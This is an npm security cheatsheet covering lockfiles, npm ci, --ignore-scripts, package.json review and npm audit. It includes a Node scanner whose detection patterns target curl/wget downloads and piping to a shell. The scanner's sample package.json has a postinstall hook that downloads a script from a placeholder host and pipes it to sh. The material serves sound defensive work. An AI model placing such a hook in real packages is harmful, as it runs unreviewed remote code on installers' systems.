@npodonnell
Last active August 26, 2020 18:55

NPM Cheatsheet

N. P. O'Donnell, 2020


Security Best Practices

Lockfiles

The package-lock.json file is generated by npm i and should be committed to source control. Its purpose is to lock every direct and transitive dependency at a specific version so that builds are deterministic.

Enforcing the Lockfile

Changing a package's version in package.json so that it goes out of sync with package-lock.json will cause npm i to install the version from package.json, which can be a security concern. To prevent this, run npm ci instead of npm i. npm ci deletes the node_modules folder and installs dependencies strictly from package-lock.json. The install fails if any inconsistency is detected between package-lock.json and package.json, and unlike npm i, npm ci never modifies package-lock.json.
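To make the consistency check concrete, here is an added Node example (not part of the original gist and not npm's own code) that compares the dependency ranges declared in package.json against the versions frozen in package-lock.json and reports any drift, which is the situation in which npm ci refuses to install. It assumes the lockfileVersion 2/3 layout, where top-level dependencies appear under packages["node_modules/<name>"], and it understands only exact, caret (^) and tilde (~) ranges; any other range syntax is reported for manual review rather than guessed at. The package.json and lockfile contents are constructed sample data.

```javascript
// Added example: detect drift between package.json and package-lock.json.
// Assumes lockfileVersion 2 or 3 (top-level deps under packages["node_modules/<name>"]).
// Only exact, ^ and ~ ranges are evaluated; other syntax is flagged for manual review.

// Parse "MAJOR.MINOR.PATCH" into [major, minor, patch]; null if not a plain version.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(v);
  return m ? m.slice(1, 4).map(Number) : null;
}

// Returns true/false when `locked` satisfies `range`, or null if the range syntax is unsupported.
function satisfies(range, locked) {
  const l = parseVersion(locked);
  if (!l) return false;
  const op = range.startsWith('^') ? '^' : range.startsWith('~') ? '~' : '';
  const base = parseVersion(range.slice(op.length));
  if (!base) return null; // e.g. "latest", ">=1.0.0", "*": not handled here
  const [bMaj, bMin, bPat] = base;
  const [lMaj, lMin, lPat] = l;
  // locked >= base (lexicographic on the three components)
  const atLeastBase =
    lMaj > bMaj ||
    (lMaj === bMaj && (lMin > bMin || (lMin === bMin && lPat >= bPat)));
  if (op === '') return lMaj === bMaj && lMin === bMin && lPat === bPat;
  if (op === '~') return atLeastBase && lMaj === bMaj && lMin === bMin;
  // caret: same major; for 0.x the minor is fixed; for 0.0.x the patch is fixed
  if (bMaj > 0) return atLeastBase && lMaj === bMaj;
  if (bMin > 0) return atLeastBase && lMaj === 0 && lMin === bMin;
  return lMaj === 0 && lMin === 0 && lPat === bPat;
}

// Compare declared deps (dependencies + devDependencies) with the lockfile entries.
function findLockfileDrift(pkg, lock) {
  const problems = [];
  const declared = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  const packages = lock.packages || {};
  for (const [name, range] of Object.entries(declared)) {
    const entry = packages[`node_modules/${name}`];
    if (!entry) {
      problems.push(`${name}: missing from package-lock.json`);
      continue;
    }
    const ok = satisfies(range, entry.version);
    if (ok === null) problems.push(`${name}: range "${range}" not checked, review manually`);
    else if (!ok) problems.push(`${name}: locked ${entry.version} does not satisfy ${range}`);
  }
  return problems;
}

// Constructed sample input: package.json was bumped to ^4.18.0 after the lockfile
// froze express at 4.17.21, and jest was added without regenerating the lockfile.
const samplePkg = {
  dependencies: { express: '^4.18.0', lodash: '~4.17.0' },
  devDependencies: { jest: '29.0.0' },
};
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    'node_modules/express': { version: '4.17.21' },
    'node_modules/lodash': { version: '4.17.21' },
  },
};

console.log(findLockfileDrift(samplePkg, sampleLock));
```

On the sample data the script reports express (the locked 4.17.21 no longer satisfies ^4.18.0) and jest (absent from the lockfile), while lodash passes; these are exactly the two edits that would make npm ci fail where npm i would quietly resolve new versions.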

Ignore Scripts when Installing

When installing a package, always pass the --ignore-scripts option to prevent lifecycle scripts from being run. To make this the default, update the npm config:

npm config set ignore-scripts true

Manually Inspect package.json

Manually inspect the package.json of any new or unknown package for anything odd before running any npm commands against it. There are ways for attackers to have arbitrary scripts run from nothing more than an npm install. See this video.
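The install-time hooks are the part of package.json worth reading first, because npm runs them without any further action from the user. The following is an added Node example (not from the original gist) that lists the lifecycle scripts npm would execute automatically during an install and marks commands that fetch remote content, run inline code or decode base64. The hook names are npm's documented install and prepare lifecycle events; the indicator patterns are simple heuristics chosen here, and the package.json is a constructed sample, not a real package.

```javascript
// Added example: surface the scripts in a package.json that npm runs automatically
// at install time, so they can be reviewed before `npm install` touches the package.

// npm lifecycle hooks that run during an install of the package itself (npm 7+ docs).
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'preprepare', 'postprepare', 'prepublish'];

// Heuristic indicators chosen for this example; a hit means "read this one carefully".
const HEURISTICS = [
  { label: 'downloads content', re: /\b(curl|wget)\b|https?:\/\//i },
  { label: 'pipes to a shell', re: /\|\s*(sh|bash)\b/ },
  { label: 'runs inline code', re: /\bnode\s+-e\b|\beval\b/ },
  { label: 'decodes base64', re: /base64/i },
];

// Returns one finding per install-time hook present: { hook, command, flags }.
// Hooks are reported in INSTALL_HOOKS order; non-install scripts (test, build, ...) are ignored.
function reviewInstallScripts(pkgJsonText) {
  const pkg = JSON.parse(pkgJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const command = String(scripts[hook]);
    const flags = HEURISTICS.filter((h) => h.re.test(command)).map((h) => h.label);
    findings.push({ hook, command, flags });
  }
  return findings;
}

// Constructed sample package.json (not a real package): a benign prepare step and a
// postinstall that fetches a remote script and pipes it to a shell.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'example-pkg',
  version: '1.0.0',
  scripts: {
    prepare: 'tsc -p .',
    postinstall: 'curl -s https://example.invalid/setup.sh | sh',
    test: 'jest',
  },
});

for (const f of reviewInstallScripts(SAMPLE_PACKAGE_JSON)) {
  const verdict = f.flags.length ? `REVIEW (${f.flags.join(', ')})` : 'no indicators';
  console.log(`${f.hook}: ${f.command}  ->  ${verdict}`);
}
```

A clean report does not make a package safe (a hook can run a script file shipped inside the tarball with no indicator in the one-line command), so the output is a reading guide, not a verdict; combined with --ignore-scripts it lets you decide per package whether a hook is needed at all.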

Don't Rush to Update/Upgrade Packages

When a new major version of a package is released, wait for it to be adopted by the community and for any early issues to be caught before upgrading to it. When updating minor versions for security or bug fixes, run npm outdated to see which packages are out of date, and update each package individually. Read the release notes, and make sure you understand the implications of each update.

Scan for Vulnerabilities

Use npm audit to scan for security vulnerabilities in your dependencies.
